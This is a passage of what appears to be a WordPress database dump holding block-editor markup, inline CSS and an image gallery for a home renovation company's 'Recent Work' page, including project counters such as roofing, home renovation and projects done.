style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">320</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Roofing &amp; Siding</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Recent Work','','publish','closed','closed','','recent-works','','','2022-08-24 17:54:14','2022-08-24 17:54:14','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?page_id=166',0,'page','',0),(451,1,'2022-08-23 18:46:06','2022-08-23 18:46:06','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":450,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/25660384_1899639140050518_6277447985993158090_n.jpg\" alt=\"\" class=\"wp-image-450\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":449,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/25592097_1899639136717185_4321270429465251825_n.jpg\" alt=\"\" class=\"wp-image-449\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":448,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23844616_1868197126528053_4157812209739993838_n.jpg\" alt=\"\" class=\"wp-image-448\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":447,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23843260_1868197133194719_3148537784022538449_n.jpg\" alt=\"\" class=\"wp-image-447\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":446,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23795383_1868197219861377_192834509148892931_n.jpg\" alt=\"\" class=\"wp-image-446\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":445,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23517652_1851799148167851_4518671867384389908_n.jpg\" alt=\"\" class=\"wp-image-445\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":444,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18119545_1646581548689613_8488233903493088586_n.jpg\" alt=\"\" class=\"wp-image-444\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":442,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18118635_1641106092570492_880445919232503964_n.jpg\" alt=\"\" class=\"wp-image-442\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":412,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/280659088_5602458996435162_2458487168335242841_n.jpg\" alt=\"\" class=\"wp-image-412\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":413,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/c60adea113fb2f5f80419bb170309509.jpg\" alt=\"\" class=\"wp-image-413\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":414,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/DSC03903-1.jpg\" alt=\"\" class=\"wp-image-414\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":436,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/12038053_1138498862831220_6417864339135922840_n.jpg\" alt=\"\" class=\"wp-image-436\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":438,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/17992072_1641106229237145_7019424871005086701_n-1.jpg\" alt=\"\" class=\"wp-image-438\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":440,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18033957_1641106155903819_3439710667750671365_n.jpg\" alt=\"\" class=\"wp-image-440\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":441,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18057957_1641106209237147_2139335743547445839_n.jpg\" alt=\"\" class=\"wp-image-441\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"e6bf0ffa-3eaa-4534-b455-9beecc921917\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-e6bf0ffa-3eaa-4534-b455-9beecc921917 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"a04abd1a-807e-4d54-ad26-1bbc32a197ae\"} -->\n<style type=\"text/css\"> .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a04abd1a-807e-4d54-ad26-1bbc32a197ae skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"5a8ddce2-df06-41fe-9ad7-cb94cdf697aa\"} -->\n<style type=\"text/css\"> .block-5a8ddce2-df06-41fe-9ad7-cb94cdf697aa .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5a8ddce2-df06-41fe-9ad7-cb94cdf697aa .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5a8ddce2-df06-41fe-9ad7-cb94cdf697aa .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5a8ddce2-df06-41fe-9ad7-cb94cdf697aa .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5a8ddce2-df06-41fe-9ad7-cb94cdf697aa .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5a8ddce2-df06-41fe-9ad7-cb94cdf697aa\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"7763ad54-c1cc-4f65-87d7-1c2467612e7f\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Renovation</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"4b24daa2-96c4-4eee-b9d4-6d780518f21a\"} -->\n<style type=\"text/css\"> .block-4b24daa2-96c4-4eee-b9d4-6d780518f21a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-4b24daa2-96c4-4eee-b9d4-6d780518f21a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-4b24daa2-96c4-4eee-b9d4-6d780518f21a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-4b24daa2-96c4-4eee-b9d4-6d780518f21a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-4b24daa2-96c4-4eee-b9d4-6d780518f21a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-4b24daa2-96c4-4eee-b9d4-6d780518f21a\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"5c79f897-df50-4b94-a7b6-bd978675eb31\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Project Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"1e9b3b34-822d-44f1-8727-46320a6bc479\"} -->\n<style type=\"text/css\"> .block-1e9b3b34-822d-44f1-8727-46320a6bc479 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-1e9b3b34-822d-44f1-8727-46320a6bc479 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-1e9b3b34-822d-44f1-8727-46320a6bc479 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; 